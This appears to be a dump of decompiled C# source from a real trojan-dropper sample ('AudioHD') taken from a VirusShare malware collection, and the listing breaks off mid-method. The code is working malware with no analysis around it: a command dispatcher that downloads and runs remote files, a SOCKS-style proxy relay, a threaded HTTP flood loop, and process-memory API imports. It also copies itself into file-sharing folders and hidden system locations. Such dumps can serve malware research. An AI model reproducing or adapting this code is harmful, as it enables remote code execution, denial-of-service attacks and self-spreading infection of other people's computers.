+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0008;
+using System;
+using System.Runtime.InteropServices;
+
+namespace \u0008
+{
+  internal static class \u0006
+  {
+    [DllImport("user32.dll", EntryPoint = "FindWindowEx", SetLastError = true)]
+    public static extern IntPtr \u000F([In] IntPtr obj0, [In] IntPtr obj1, [In] string obj2, [In] string obj3);
+
+    [DllImport("user32.dll", EntryPoint = "GetDlgItem")]
+    public static extern IntPtr \u000F([In] IntPtr obj0, [In] int obj1);
+
+    [DllImport("user32.dll", EntryPoint = "GetMenu")]
+    public static extern IntPtr \u000F([In] IntPtr obj0);
+
+    [DllImport("user32.dll", EntryPoint = "GetSubMenu", CharSet = CharSet.Ansi, SetLastError = true)]
+    public static extern IntPtr \u0010([In] IntPtr obj0, [In] int obj1);
+
+    [DllImport("user32.dll", EntryPoint = "GetMenuItemID")]
+    public static extern uint \u000F([In] IntPtr obj0, [In] int obj1);
+
+    [DllImport("user32.dll", EntryPoint = "EnableMenuItem")]
+    public static extern bool \u000F([In] IntPtr obj0, [In] uint obj1, [In] uint obj2);
+
+    [DllImport("user32.dll", EntryPoint = "RemoveMenu")]
+    public static extern bool \u0010([In] IntPtr obj0, [In] uint obj1, [In] uint obj2);
+
+    [DllImport("user32.dll", EntryPoint = "SendMessage", CharSet = CharSet.Auto)]
+    public static extern IntPtr \u000F([In] IntPtr obj0, [In] uint obj1, [In] IntPtr obj2, [In] IntPtr obj3);
+
+    [DllImport("user32.dll", EntryPoint = "SendMessage", CharSet = CharSet.Auto)]
+    public static extern IntPtr \u000F([In] IntPtr obj0, [In] uint obj1, [In] IntPtr obj2, [In] string obj3);
+
+    [DllImport("user32.dll", EntryPoint = "LockWindowUpdate")]
+    public static extern bool \u000F([In] IntPtr obj0);
+
+    [DllImport("user32.dll", EntryPoint = "GetWindowPlacement")]
+    public static extern bool \u000F([In] IntPtr obj0, [In] ref \u0006.\u0004 obj1);
+
+    [DllImport("kernel32.dll", EntryPoint = "OpenProcess")]
+    public static extern IntPtr \u000F([In] uint obj0, [MarshalAs(UnmanagedType.Bool)] bool bInheritHandle, [In] int obj2);
+
+    [DllImport("kernel32.dll", EntryPoint = "CloseHandle")]
+    public static extern bool \u0010([In] IntPtr obj0);
+
+    [DllImport("kernel32.dll", EntryPoint = "VirtualAllocEx", SetLastError = true)]
+    public static extern IntPtr \u000F(
+      [In] IntPtr obj0,
+      [In] IntPtr obj1,
+      [In] uint obj2,
+      [In] uint obj3,
+      [In] uint obj4);
+
+    [DllImport("kernel32.dll", EntryPoint = "VirtualFreeEx", SetLastError = true)]
+    public static extern bool \u000F([In] IntPtr obj0, [In] IntPtr obj1, [In] int obj2, [In] uint obj3);
+
+    [DllImport("kernel32.dll", EntryPoint = "ReadProcessMemory")]
+    public static extern bool \u000F([In] IntPtr obj0, [In] IntPtr obj1, [In] IntPtr obj2, [In] int obj3, [In] int obj4);
+
+    [DllImport("kernel32.dll", EntryPoint = "WriteProcessMemory")]
+    public static extern bool \u000F(
+      [In] IntPtr obj0,
+      [In] IntPtr obj1,
+      [In] ref \u0006.\u0001 obj2,
+      [In] int obj3,
+      [In] int obj4);
+
+    [DllImport("user32.dll", EntryPoint = "GetWindowThreadProcessId", SetLastError = true)]
+    public static extern uint \u000F([In] IntPtr obj0, out uint lpdwProcessId);
+
+    public struct \u0001
+    {
+      public uint \u0001;
+      public int \u0001;
+      public int \u0002;
+      public uint \u0002;
+      public uint \u0003;
+      public IntPtr \u0001;
+      public int \u0003;
+      public int \u0004;
+    }
+
+    public struct \u0002
+    {
+      private int \u0001;
+      private int \u0002;
+      private int \u0003;
+      private int \u0004;
+    }
+
+    public struct \u0003
+    {
+      private int \u0001;
+      private int \u0002;
+    }
+
+    public struct \u0004
+    {
+      public int \u0001;
+      public int \u0002;
+      public int \u0003;
+      public \u0006.\u0003 \u0001;
+      public \u0006.\u0003 \u0002;
+      public \u0006.\u0002 \u0001;
+    }
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0008/_0007.cs

@@ -0,0 +1,127 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0001;
+using \u0008;
+using System;
+using System.Net;
+using System.Net.Sockets;
+using System.Runtime.InteropServices;
+using System.Text;
+using System.Threading;
+
+namespace \u0008
+{
+  internal sealed class \u0007
+  {
+    [NonSerialized]
+    internal static \u0002 \u0001;
+    private TcpClient \u0001;
+    private TcpClient \u0002;
+    private byte \u0001 = 5;
+    private byte \u0002;
+    private byte \u0003;
+    private byte \u0004 = 1;
+    private byte \u0005 = 3;
+
+    public \u0007([In] TcpClient obj0) => this.\u0001 = obj0;
+
+    public void \u000F()
+    {
+      NetworkStream stream1 = this.\u0001.GetStream();
+      byte[] buffer1 = new byte[2];
+      stream1.Read(buffer1, 0, 2);
+      byte[] buffer2 = new byte[(int) buffer1[1]];
+      stream1.Read(buffer2, 0, buffer2.Length);
+      byte[] buffer3 = new byte[2]
+      {
+        this.\u0001,
+        this.\u0002
+      };
+      stream1.Write(buffer3, 0, 2);
+      byte[] buffer4 = new byte[4];
+      stream1.Read(buffer4, 0, 4);
+      string hostname = \u0007.\u0001(940);
+      if ((int) buffer4[3] == (int) this.\u0004)
+      {
+        byte[] numArray = new byte[4];
+        stream1.Read(numArray, 0, 4);
+        hostname = new IPAddress(numArray).ToString();
+      }
+      else if ((int) buffer4[3] == (int) this.\u0005)
+      {
+        byte[] buffer5 = new byte[1];
+        stream1.Read(buffer5, 0, 1);
+        byte[] numArray = new byte[(int) buffer5[0]];
+        stream1.Read(numArray, 0, (int) buffer5[0]);
+        hostname = Encoding.Default.GetString(numArray);
+      }
+      if (!(hostname != \u0007.\u0001(940)))
+        return;
+      byte[] buffer6 = new byte[2];
+      stream1.Read(buffer6, 0, 2);
+      int uint16 = (int) BitConverter.ToUInt16(new byte[2]
+      {
+        buffer6[1],
+        buffer6[0]
+      }, 0);
+      Console.WriteLine(\u0007.\u0001(2546) + hostname + \u0007.\u0001(1788) + uint16.ToString());
+      this.\u0002 = new TcpClient(hostname, uint16);
+      if (!this.\u0002.Connected)
+        return;
+      byte[] buffer7 = new byte[10];
+      buffer7[0] = this.\u0001;
+      buffer7[1] = this.\u0003;
+      buffer7[2] = (byte) 0;
+      buffer7[3] = (byte) 1;
+      IPAddress ipAddress = IPAddress.Parse(this.\u0002.Client.LocalEndPoint.ToString().Split(':')[0]);
+      buffer7[4] = ipAddress.GetAddressBytes()[0];
+      buffer7[5] = ipAddress.GetAddressBytes()[1];
+      buffer7[6] = ipAddress.GetAddressBytes()[2];
+      buffer7[7] = ipAddress.GetAddressBytes()[3];
+      int num = int.Parse(this.\u0002.Client.LocalEndPoint.ToString().Split(':')[1]);
+      buffer7[8] = BitConverter.GetBytes((ushort) num)[0];
+      buffer7[9] = BitConverter.GetBytes((ushort) num)[1];
+      stream1.Write(buffer7, 0, 10);
+      NetworkStream stream2 = this.\u0002.GetStream();
+      bool flag = false;
+      while (this.\u0002.Connected && this.\u0001.Connected && !flag)
+      {
+        Thread.Sleep(100);
+        try
+        {
+          if (stream1.DataAvailable)
+          {
+            byte[] numArray1 = new byte[10000];
+            int length = stream1.Read(numArray1, 0, 10000);
+            byte[] numArray2 = new byte[length];
+            Array.Copy((Array) numArray1, (Array) numArray2, length);
+            stream2.Write(numArray2, 0, numArray2.Length);
+          }
+          if (stream2.DataAvailable)
+          {
+            byte[] numArray3 = new byte[10000];
+            int length = stream2.Read(numArray3, 0, 10000);
+            byte[] numArray4 = new byte[length];
+            Array.Copy((Array) numArray3, (Array) numArray4, length);
+            stream1.Write(numArray4, 0, numArray4.Length);
+          }
+        }
+        catch
+        {
+          flag = true;
+        }
+      }
+      if (this.\u0001.Connected)
+        this.\u0001.Close();
+      if (!this.\u0002.Connected)
+        return;
+      this.\u0002.Close();
+    }
+
+    static \u0007() => \u0003.\u000F();
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0008/_0008.cs

@@ -0,0 +1,81 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0001;
+using System;
+using System.Diagnostics;
+using System.IO;
+using System.Runtime.InteropServices;
+using System.Security.Cryptography;
+using System.Security.Principal;
+using System.Text;
+
+namespace \u0008
+{
+  internal sealed class \u0008
+  {
+    [NonSerialized]
+    internal static \u0002 \u0001;
+
+    public void \u000F()
+    {
+      GC.Collect();
+      GC.WaitForPendingFinalizers();
+      if (Environment.OSVersion.Platform != PlatformID.Win32NT)
+        return;
+      \u0008.\u0008.\u000F(Process.GetCurrentProcess().Handle, -1, -1);
+    }
+
+    public bool \u000F([In] string obj0) => Process.GetProcessesByName(obj0).Length > 0;
+
+    private string \u000F([In] string obj0)
+    {
+      FileStream inputStream = File.OpenRead(obj0);
+      byte[] hash = new MD5CryptoServiceProvider().ComputeHash((Stream) inputStream);
+      inputStream.Close();
+      return BitConverter.ToString(hash).Replace(\u0008.\u0008.\u0001(1891), \u0008.\u0008.\u0001(948)).ToUpper();
+    }
+
+    public string \u0010([In] string obj0) => BitConverter.ToString(new MD5CryptoServiceProvider().ComputeHash(Encoding.Default.GetBytes(obj0))).Replace(\u0008.\u0008.\u0001(1891), \u0008.\u0008.\u0001(948)).ToUpper();
+
+    public string \u000F([In] int obj0)
+    {
+      Random random = new Random();
+      string str = \u0008.\u0008.\u0001(2571);
+      string empty = string.Empty;
+      for (int index = 0; index < obj0; ++index)
+        empty += str.Substring(random.Next(0, str.Length), 1);
+      return empty;
+    }
+
+    public bool \u0010([In] string obj0)
+    {
+      if (!File.Exists(obj0))
+        return false;
+      if (!(this.\u000F(obj0) != this.\u000F(Process.GetCurrentProcess().MainModule.FileName)))
+        return true;
+      File.Delete(obj0);
+      return false;
+    }
+
+    public bool \u000F()
+    {
+      try
+      {
+        return new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator);
+      }
+      catch
+      {
+        return false;
+      }
+    }
+
+    [DllImport("kernel32.dll", EntryPoint = "SetProcessWorkingSetSize")]
+    private static extern int \u000F([In] IntPtr obj0, [In] int obj1, [In] int obj2);
+
+    static \u0008() => \u0003.\u000F();
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_000E/Token200007B.cs

@@ -0,0 +1,12 @@
+// Decompiled with JetBrains decompiler
+// Type: .Token200007B
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+namespace \u000E
+{
+  internal class Token200007B : \u0024Unresolved\u0024Token\u003A2003FFF
+  {
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_000E/_0001.cs

@@ -0,0 +1,71 @@
+// Decompiled with JetBrains decompiler
+// Type: .

+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0001;
+using System;
+
+namespace \u000E
+{
+  internal sealed class \u0001
+  {
+    [NonSerialized]
+    internal static \u0002 \u0001;
+    public bool \u0001 = true;
+    public bool \u0002 = true;
+    public bool \u0003 = true;
+    public bool \u0004 = true;
+    public bool \u0005 = true;
+    public bool \u0006 = true;
+    public bool \u0007 = true;
+    public bool \u0008 = true;
+    public bool \u000E = true;
+    public bool \u000F = true;
+    public bool \u0010 = true;
+    public bool \u0011 = true;
+    public bool \u0012 = true;
+    public bool \u0013 = true;
+    public bool \u0014 = true;
+    public bool \u0015 = true;
+    public string \u0001 = \u000E.\u0001.\u0001(949);
+    public string \u0002 = \u000E.\u0001.\u0001(949);
+    public string[] \u0001 = new string[1]
+    {
+      \u000E.\u0001.\u0001(2657)
+    };
+    public string[] \u0002 = new string[1]
+    {
+      \u000E.\u0001.\u0001(2690)
+    };
+    public string[] \u0003 = new string[2]
+    {
+      \u000E.\u0001.\u0001(2715),
+      \u000E.\u0001.\u0001(2748)
+    };
+    public string[] \u0004 = new string[2]
+    {
+      \u000E.\u0001.\u0001(2785),
+      \u000E.\u0001.\u0001(2802)
+    };
+    public string[] \u0005 = new string[2]
+    {
+      \u000E.\u0001.\u0001(2819),
+      \u000E.\u0001.\u0001(2848)
+    };
+    public string[] \u0006 = new string[2];
+    public string \u0003 = \u000E.\u0001.\u0001(2885);
+    public string \u0004 = \u000E.\u0001.\u0001(2902);
+    public string \u0005 = \u000E.\u0001.\u0001(2927);
+    public string \u0006 = \u000E.\u0001.\u0001(2952);
+    public int \u0001 = 30;
+    public int \u0002 = 5;
+    public string \u0007 = string.Empty;
+    public string \u0008 = string.Empty;
+    public string \u000E = Environment.MachineName;
+    public bool \u0016;
+
+    static \u0001() => \u0003.\u000F();
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_000E/_0002.cs

@@ -0,0 +1,90 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0001;
+using \u000E;
+using System;
+using System.Net;
+using System.Runtime.InteropServices;
+using System.Threading;
+
+namespace \u000E
+{
+  internal sealed class \u0002
+  {
+    [NonSerialized]
+    internal static \u0002 \u0001;
+    private static ThreadStart[] \u0001;
+    private static Thread[] \u0001;
+    public static string \u0001;
+    private static \u0002.\u0001[] \u0001;
+    public static int \u0001;
+    public static int \u0002;
+    public static bool \u0001;
+
+    public static void \u000F()
+    {
+      \u0002.\u0001 = new Thread[\u0002.\u0001];
+      \u0002.\u0001 = new ThreadStart[\u0002.\u0001];
+      \u0002.\u0001 = new \u0002.\u0001[\u0002.\u0001];
+      if (!\u0002.\u0001.StartsWith(\u0002.\u0001(3036)))
+        \u0002.\u0001 = \u0002.\u0001(3036) + \u0002.\u0001;
+      for (int index = 0; index < \u0002.\u0001; ++index)
+      {
+        \u0002.\u0001[index] = new \u0002.\u0001(\u0002.\u0001);
+        \u0002.\u0001[index] = new ThreadStart(\u0002.\u0001[index].\u000F);
+        \u0002.\u0001[index] = new Thread(\u0002.\u0001[index]);
+        \u0002.\u0001[index].Start();
+      }
+      \u0002.\u0001 = true;
+    }
+
+    public static void \u0010()
+    {
+      for (int index = 0; index < \u0002.\u0001; ++index)
+      {
+        try
+        {
+          \u0002.\u0001[index].Abort();
+          \u0002.\u0001[index].Join();
+        }
+        catch
+        {
+          \u0002.\u0001 = false;
+        }
+      }
+      \u0002.\u0001 = false;
+    }
+
+    static \u0002()
+    {
+      \u0003.\u000F();
+      \u0002.\u0001 = false;
+    }
+
+    private sealed class \u0001
+    {
+      private string \u0001;
+      private WebClient \u0001 = new WebClient();
+
+      public \u0001([In] string obj0) => this.\u0001 = obj0;
+
+      public void \u000F()
+      {
+        while (true)
+        {
+          try
+          {
+            this.\u0001.DownloadString(this.\u0001);
+          }
+          catch
+          {
+          }
+        }
+      }
+    }
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_000E/_0003.cs

@@ -0,0 +1,242 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0001;
+using \u0008;
+using \u000E;
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.Net;
+using System.Runtime.InteropServices;
+
+namespace \u000E
+{
+  internal class \u0003
+  {
+    [NonSerialized]
+    internal static \u0002 \u0001;
+    private static \u000E.\u0008 \u0001;
+
+    public void \u000F([In] string obj0)
+    {
+      string[] strArray = new string[0];
+      WebClient webClient = new WebClient();
+      try
+      {
+        strArray = obj0.Split('|');
+      }
+      catch
+      {
+      }
+      string key;
+      if ((key = strArray[0]) == null)
+        return;
+      // ISSUE: reference to a compiler-generated field
+      if (\u0010.\u0001.\u0001 == null)
+      {
+        // ISSUE: reference to a compiler-generated field
+        \u0010.\u0001.\u0001 = new Dictionary<string, int>(10)
+        {
+          {
+            \u0003.\u0001(3059),
+            0
+          },
+          {
+            \u0003.\u0001(3080),
+            1
+          },
+          {
+            \u0003.\u0001(3101),
+            2
+          },
+          {
+            \u0003.\u0001(3122),
+            3
+          },
+          {
+            \u0003.\u0001(3143),
+            4
+          },
+          {
+            \u0003.\u0001(3152),
+            5
+          },
+          {
+            \u0003.\u0001(3161),
+            6
+          },
+          {
+            \u0003.\u0001(3170),
+            7
+          },
+          {
+            \u0003.\u0001(3179),
+            8
+          },
+          {
+            \u0003.\u0001(3188),
+            9
+          }
+        };
+      }
+      int num;
+      // ISSUE: reference to a compiler-generated field
+      // ISSUE: explicit non-virtual call
+      if (!__nonvirtual (\u0010.\u0001.\u0001.TryGetValue(key, out num)))
+        return;
+      switch (num)
+      {
+        case 0:
+          try
+          {
+            \u0007.\u0008.\u0010();
+            break;
+          }
+          catch (Exception ex)
+          {
+            \u0003.\u0001.\u0010(ex.ToString());
+            break;
+          }
+        case 1:
+          try
+          {
+            \u0002.\u0010();
+            break;
+          }
+          catch (Exception ex)
+          {
+            \u0003.\u0001.\u0010(ex.ToString());
+            break;
+          }
+        case 2:
+          try
+          {
+            \u000F.\u0007.\u0010();
+            break;
+          }
+          catch (Exception ex)
+          {
+            \u0003.\u0001.\u0010(ex.ToString());
+            break;
+          }
+        case 3:
+          try
+          {
+            \u0003.\u0010();
+            break;
+          }
+          catch (Exception ex)
+          {
+            \u0003.\u0001.\u0010(ex.ToString());
+            break;
+          }
+        case 4:
+          try
+          {
+            if (\u0007.\u0008.\u0001)
+              break;
+            \u0007.\u0008.\u0001 = Convert.ToString(strArray[1]);
+            \u0007.\u0008.\u0001 = ushort.Parse(strArray[2]);
+            \u0007.\u0008.\u0002 = Convert.ToInt32(strArray[3]);
+            \u0007.\u0008.\u0001 = Convert.ToInt32(strArray[4]);
+            \u0007.\u0008.\u000F();
+            break;
+          }
+          catch (Exception ex)
+          {
+            \u0003.\u0001.\u0010(ex.ToString());
+            break;
+          }
+        case 5:
+          try
+          {
+            if (\u0002.\u0001)
+              break;
+            \u0002.\u0001 = Convert.ToString(strArray[1]);
+            \u0002.\u0002 = Convert.ToInt32(strArray[2]);
+            \u0002.\u0001 = Convert.ToInt32(strArray[2]);
+            \u0002.\u000F();
+            break;
+          }
+          catch (Exception ex)
+          {
+            \u0003.\u0001.\u0010(ex.ToString());
+            break;
+          }
+        case 6:
+          try
+          {
+            if (\u000F.\u0007.\u0001)
+              break;
+            \u000F.\u0007.\u0001 = Convert.ToString(strArray[1]);
+            \u000F.\u0007.\u0001 = ushort.Parse(strArray[2]);
+            \u000F.\u0007.\u0002 = Convert.ToInt32(strArray[3]);
+            \u000F.\u0007.\u0003 = Convert.ToInt32(strArray[4]);
+            \u000F.\u0007.\u0001 = 500;
+            \u000F.\u0007.\u000F();
+            break;
+          }
+          catch (Exception ex)
+          {
+            \u0003.\u0001.\u0010(ex.ToString());
+            break;
+          }
+        case 7:
+          try
+          {
+            if (\u0003.\u0001)
+              break;
+            \u0003.\u0001 = Convert.ToString(strArray[1]);
+            \u0003.\u0003 = Convert.ToInt32(strArray[3]);
+            \u0003.\u0001 = Convert.ToInt32(strArray[4]);
+            \u0003.\u0002 = 500;
+            \u0003.\u000F();
+            break;
+          }
+          catch (Exception ex)
+          {
+            \u0003.\u0001.\u0010(ex.ToString());
+            break;
+          }
+        case 8:
+          try
+          {
+            if (strArray[3] == \u0003.\u0001(3201))
+            {
+              string str = Convert.ToString(strArray[1]);
+              if (!str.StartsWith(\u0003.\u0001(3046)))
+                str = \u0003.\u0001(3046) + str;
+              \u000F.\u0001.\u0001.\u000F(str);
+              break;
+            }
+            string str1 = \u000F.\u0001.\u0001.\u000F(new Random().Next(5, 12)) + \u0003.\u0001(3206);
+            string address = Convert.ToString(strArray[1]);
+            if (!address.StartsWith(\u0003.\u0001(3046)))
+              address = \u0003.\u0001(3046) + address;
+            webClient.DownloadFile(address, Environment.GetEnvironmentVariable(\u0003.\u0001(3215)) + \u0003.\u0001(1967) + str1);
+            Process process = new Process();
+            process.StartInfo.FileName = Environment.GetEnvironmentVariable(\u0003.\u0001(3215)) + \u0003.\u0001(1967) + str1;
+            if (strArray[2].ToString() != \u0003.\u0001(994))
+              process.StartInfo.Arguments = strArray[2].ToString();
+            process.Start();
+            break;
+          }
+          catch (Exception ex)
+          {
+            \u0003.\u0001.\u0010(ex.ToString());
+            break;
+          }
+      }
+    }
+
+    static \u0003()
+    {
+      \u0003.\u000F();
+      \u0003.\u0001 = new \u000E.\u0008();
+    }
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_000E/_0004.cs

@@ -0,0 +1,95 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0001;
+using \u000E;
+using Microsoft.Win32;
+using System;
+using System.Diagnostics;
+using System.IO;
+using System.Runtime.InteropServices;
+
+namespace \u000E
+{
+  internal sealed class \u0004
+  {
+    [NonSerialized]
+    internal static \u0002 \u0001;
+    private static string \u0001;
+
+    public static void \u000F([In] string obj0)
+    {
+      RegistryKey registryKey = Registry.CurrentUser.OpenSubKey(\u0004.\u0001(3226), false);
+      if (registryKey == null)
+        return;
+      \u0004.\u000F(registryKey.GetValue(\u0004.\u0001(3275)).ToString() + \u0004.\u0001(1969), obj0);
+    }
+
+    public static void \u0010([In] string obj0)
+    {
+      string str1 = Environment.GetFolderPath(Environment.SpecialFolder.Personal).Replace(\u0004.\u0001(3296), \u0004.\u0001(3309));
+      string str2 = \u0004.\u0001 + \u0004.\u0001(3346);
+      \u0004.\u000F(str1, obj0);
+      \u0004.\u000F(str2, obj0);
+    }
+
+    public static void \u0011([In] string obj0)
+    {
+      string str1 = \u0004.\u0001 + \u0004.\u0001(3371);
+      string str2 = \u0004.\u0001 + \u0004.\u0001(3404);
+      string str3 = \u0004.\u0001 + \u0004.\u0001(3445);
+      \u0004.\u000F(str1, obj0);
+      \u0004.\u000F(str2, obj0);
+      \u0004.\u000F(str3, obj0);
+    }
+
+    public static void \u0012([In] string obj0) => \u0004.\u000F(\u0004.\u0001 + \u0004.\u0001(3490), obj0);
+
+    public static void \u0013([In] string obj0) => \u0004.\u000F(\u0004.\u0001 + \u0004.\u0001(3519), obj0);
+
+    public static void \u0014([In] string obj0) => \u0004.\u000F(\u0004.\u0001 + \u0004.\u0001(3552), obj0);
+
+    public static void \u0015([In] string obj0) => \u0004.\u000F(\u0004.\u0001 + \u0004.\u0001(3577), obj0);
+
+    public static void \u0016([In] string obj0) => \u0004.\u000F(\u0004.\u0001 + \u0004.\u0001(3610), obj0);
+
+    public static void \u0017([In] string obj0) => \u0004.\u000F(\u0004.\u0001 + \u0004.\u0001(3647), obj0);
+
+    public static void \u0018([In] string obj0) => \u0004.\u000F(\u0004.\u0001 + \u0004.\u0001(3672), obj0);
+
+    public static void \u0019([In] string obj0) => \u0004.\u000F(\u0004.\u0001 + \u0004.\u0001(3693), obj0);
+
+    public static void \u000F([In] string obj0, [In] string obj1)
+    {
+      if (!Directory.Exists(obj0))
+        return;
+      if (File.Exists(obj0 + obj1))
+        return;
+      try
+      {
+        File.Copy(Process.GetCurrentProcess().MainModule.FileName, obj0 + obj1, true);
+        FileStream fileStream = File.OpenWrite(obj0 + obj1);
+        long num1 = fileStream.Seek(0L, SeekOrigin.End);
+        Decimal num2 = (Decimal) (Convert.ToInt32(obj1.Length) * 10485);
+        while ((Decimal) num1 < num2)
+        {
+          ++num1;
+          fileStream.WriteByte((byte) 0);
+        }
+        fileStream.Close();
+      }
+      catch
+      {
+      }
+    }
+
+    static \u0004()
+    {
+      \u0003.\u000F();
+      \u0004.\u0001 = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles);
+    }
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_000E/_0005.cs

@@ -0,0 +1,202 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0001;
+using \u0008;
+using \u000E;
+using \u000F;
+using Microsoft.Win32;
+using System;
+using System.Diagnostics;
+using System.IO;
+using System.Net;
+using System.Runtime.InteropServices;
+using System.Threading;
+
+namespace \u000E
+{
+  internal sealed class \u0005
+  {
+    [NonSerialized]
+    internal static \u0002 \u0001;
+    private Mutex \u0001;
+    private \u0002 \u0001 = new \u0002();
+
+    public void \u000F()
+    {
+      this.\u0011();
+      this.\u0013();
+      this.\u0012();
+      this.\u0001.\u000F();
+      new Thread(new ThreadStart(\u0005.\u0010)).Start();
+    }
+
+    public static void \u0010()
+    {
+      Registry.CurrentUser.OpenSubKey(\u0005.\u0001(3716));
+      while (true)
+      {
+        try
+        {
+          \u0005.\u000F(Process.GetProcessById(Process.GetCurrentProcess().Id));
+          Thread.Sleep(10);
+        }
+        catch
+        {
+        }
+      }
+    }
+
+    private void \u0011()
+    {
+      try
+      {
+        this.\u0001 = new Mutex(true, \u000F.\u0001.\u0001.\u0003);
+        this.\u0001.ReleaseMutex();
+      }
+      catch
+      {
+        Environment.Exit(0);
+      }
+    }
+
+    private void \u0012()
+    {
+      string fileName = Process.GetCurrentProcess().MainModule.FileName;
+      if (\u000F.\u0001.\u0001.\u0016)
+      {
+        \u000F.\u0001.\u0001.\u0006[0] = Environment.GetFolderPath(Environment.SpecialFolder.System) + \u0005.\u0001(1971) + \u000F.\u0001.\u0001.\u0004[0];
+        \u000F.\u0001.\u0001.\u0006[1] = Environment.GetFolderPath(Environment.SpecialFolder.CommonProgramFiles) + \u0005.\u0001(1971) + \u000F.\u0001.\u0001.\u0004[1];
+      }
+      else
+      {
+        \u000F.\u0001.\u0001.\u0006[0] = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0005.\u0001(1971) + \u000F.\u0001.\u0001.\u0004[0];
+        \u000F.\u0001.\u0001.\u0006[1] = Environment.GetEnvironmentVariable(\u0005.\u0001(3219)) + \u0005.\u0001(1971) + \u000F.\u0001.\u0001.\u0004[1];
+      }
+      if (this.\u000F())
+        return;
+      try
+      {
+        foreach (string str in \u000F.\u0001.\u0001.\u0006)
+        {
+          if (!\u000F.\u0001.\u0001.\u0010(str))
+            System.IO.File.Copy(fileName, str);
+          System.IO.File.SetAttributes(str, FileAttributes.Hidden);
+        }
+      }
+      catch
